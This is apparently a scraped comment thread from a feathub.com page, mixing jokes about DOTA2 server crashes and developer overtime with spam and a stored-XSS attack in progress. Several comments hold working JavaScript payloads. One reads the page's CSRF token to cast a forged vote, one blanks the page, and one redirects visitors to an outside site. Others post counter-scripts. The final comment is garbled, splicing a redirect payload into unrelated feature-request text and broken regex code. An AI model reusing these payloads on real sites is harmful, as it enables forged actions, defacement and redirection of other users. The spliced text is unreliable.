LinXueyuanStdio commented almost 2 years ago Admin
mqliutie commented almost 2 years ago
The DOTA2 servers keep crashing... what kind of overtime are you guys putting in....
aihidao commented almost 2 years ago
Let me laugh at the second comment for a while.....
shen-liang commented almost 2 years ago
Zatomsmasher commented almost 2 years ago
Hahahaha
cowkeys commented almost 2 years ago
Come on, let's play a Knight-rank game
zj972 commented almost 2 years ago
The Auto Chess launcher has crashed yet again and again!!!
OrangeHao2 commented almost 2 years ago
It's interfering with my chess!
scorscor commented almost 2 years ago
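What kind of overtime are you doing... the dota2 servers lag like this all day
vale8023 commented almost 2 years ago
So it's you working overtime every day writing bugs that makes everyone's chess games so laggy?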
seuercc commented almost 2 years ago
Never mind whether you wrote the bugs or not, can you come out and apologize first?
DengZe1996 commented almost 2 years ago
The second comment made me die laughing
a18516614541 commented almost 2 years ago
Feels like your overtime is exactly what everyone wants, hahaha
RichardYM commented almost 2 years ago
Why can't I reconnect after dropping mid-game? You're not working enough overtime
endimirion commented almost 2 years ago
Hahaha, the dota2 servers really are garbage
lindianfeng commented almost 2 years ago
Overtime every day, and the pay isn't high
hh44h1144 commented almost 2 years ago
If the servers didn't lag every evening, would I have lost ten games in a row?
Rephilo commented almost 2 years ago
Haha, this reminds me of "Searching for the Dota 2 game coordinator"
doublejava commented almost 2 years ago
It's caused by too much overtime.
seiry commented almost 2 years ago
Is the coordinator server connected by hand, by people working overtime?
netsman1030 commented almost 2 years ago
Server crashes depend on server quality and deployment issues. Without fixing those thoroughly, overtime won't help either
ostopuro commented almost 2 years ago
callmeyade commented almost 2 years ago
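The China servers crash in all sorts of ways at night; I use an accelerator to reach the Singapore servers, and now Singapore is becoming unreachable too. Can we even play anymore? PS: anyone up for a Bishop-rank game?
lihualong0328 commented almost 2 years ago
The server keeps crashing, still not enough overtime...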
NinnHou commented almost 2 years ago
Yeah, still not enough overtime. (manual smirk)
BlueTangos commented almost 2 years ago
Even the servers for Major tournaments lag, what's going on
intrhuting commented almost 2 years ago
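A US-listed internet company, headquartered in Shanghai, with offices in Silicon Valley, Beijing, Shenzhen, Guangzhou and Taipei; global business, growing fast; hiring for development, operations, product, sales, business and design positions; generous pay; start at 10, leave a bit after 6, five days a week; no 996, no ICU. For an internal referral, add me on WeChat: sharehealthy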
666sbX commented almost 2 years ago
Hacked By Helen, taking apprentices, QQ925999918
LinXueyuanStdio commented almost 2 years ago Admin
table{visibility: collapse;}
reinit commented almost 2 years ago
var xmlReq = new XMLHttpRequest(); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);
reinit commented almost 2 years ago
var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Content-Length", "129"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);
xss67612 commented almost 2 years ago
document.body.innerText = '';
LinXueyuanStdio commented almost 2 years ago Admin
img,svg,table{visibility: collapse;}
superzmy commented almost 2 years ago
for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } Anti-injection patch <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>
ghostlo commented almost 2 years ago
Working overtime to write bugs, are you,,
tezml commented almost 2 years ago
Your overtime is really damn well deserved
996-ICU-Test-Xs commented almost 2 years ago
for(var x of document.getElementsByTagName('script')) { x.innerHTML = ''}
996-ICU-Test-Xs commented almost 2 years ago
for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }
guotao commented almost 2 years ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field).. Anti-injection patch for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> .